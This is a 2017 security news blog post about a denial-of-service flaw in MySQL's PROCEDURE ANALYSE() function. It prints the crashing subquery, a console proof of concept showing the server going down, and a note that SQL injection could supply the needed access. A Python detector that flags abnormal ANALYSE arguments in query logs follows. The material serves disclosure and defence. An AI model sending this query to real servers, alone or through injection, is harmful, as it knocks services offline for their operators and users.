Monday, May 29, 2017
New MySQL local zero-day affecting versions 5.5.45 and above

A new MySQL zero-day has been discovered by Osanda Malith, a security researcher and reverse engineer.

This zero-day allows an attacker to perform a denial-of-service (DoS) attack on any server running MySQL versions 5.5.45 and above. The flaw is in the PROCEDURE ANALYSE() function: the server crashes when the function is passed this subquery:

SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

Here’s a proof of concept (POC) provided by Osanda:

---------------------------------------------------------------------------------------------------------------
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server
mysql>
---------------------------------------------------------------------------------------------------------------

After executing the command, MySQL will become unresponsive, preventing the site from working. Obviously, access to the SQL database is needed, but this can be obtained if the site is vulnerable to SQL injection.
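One way to spot this pattern in a general query log or an application-side query filter, as an added example that is not part of the original article or Osanda's POC script: it flags any PROCEDURE ANALYSE call whose arguments are not the plain integers the function normally takes. The function names and the sample queries are assumptions constructed for illustration.

```python
import re

# Start of a PROCEDURE ANALYSE call, tolerant of case and spacing.
_CALL = re.compile(r"\bprocedure\s+analyse\s*\(", re.IGNORECASE)
# MySQL executes the body of /*! ... */ and /*!50000 ... */ comments: unwrap them.
_VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.DOTALL)
_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# Documented usage takes at most two integers: ANALYSE([max_elements[, max_memory]]).
_LEGIT = re.compile(r"\s*(\d+\s*(,\s*\d+\s*)?)?")

# Constructed sample of general-query-log statements (not real log data).
SAMPLE_QUERIES = [
    "SELECT id, name FROM users WHERE id = 7",
    "SELECT * FROM orders PROCEDURE ANALYSE()",
    "SELECT * FROM orders PROCEDURE ANALYSE(10, 2000)",
    "select * from information_schema.tables procedure analyse((select*from(select 1)x),1)",
    "SELECT * FROM t /*!50000PROCEDURE*/ ANALYSE /**/ ((SELECT 1), 1)",
]


def normalise(sql):
    """Unwrap executable comments, drop ordinary ones, collapse whitespace."""
    sql = _VERSIONED.sub(r" \1 ", sql)
    sql = _COMMENT.sub(" ", sql)
    return " ".join(sql.split())


def analyse_args(sql):
    """Return the argument text of each PROCEDURE ANALYSE(...) call in sql."""
    sql = normalise(sql)
    found = []
    for m in _CALL.finditer(sql):
        depth, i = 1, m.end()
        while i < len(sql) and depth:  # walk to the matching close parenthesis
            depth += {"(": 1, ")": -1}.get(sql[i], 0)
            i += 1
        found.append(sql[m.end():i - 1] if depth == 0 else sql[m.end():])
    return found


def is_suspicious(sql):
    """True when any call carries arguments other than up to two integers."""
    return any(not _LEGIT.fullmatch(arg) for arg in analyse_args(sql))


def flagged(queries):
    """Indexes of the queries that should be alerted on or rejected."""
    return [i for i, q in enumerate(queries) if is_suspicious(q)]
```

The matcher does not parse string literals, so a quoted string that happens to contain the call text is also flagged; for this check that errs toward false positives rather than misses.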

For a more in-depth analysis, visit Osanda’s blog, here.

Download his POC script written in Python, here.

About Kyle

Co-owner, writer and editor at Zerosecurity. Security and tech enthusiast. Programmer. Music lover and avid festival goer.
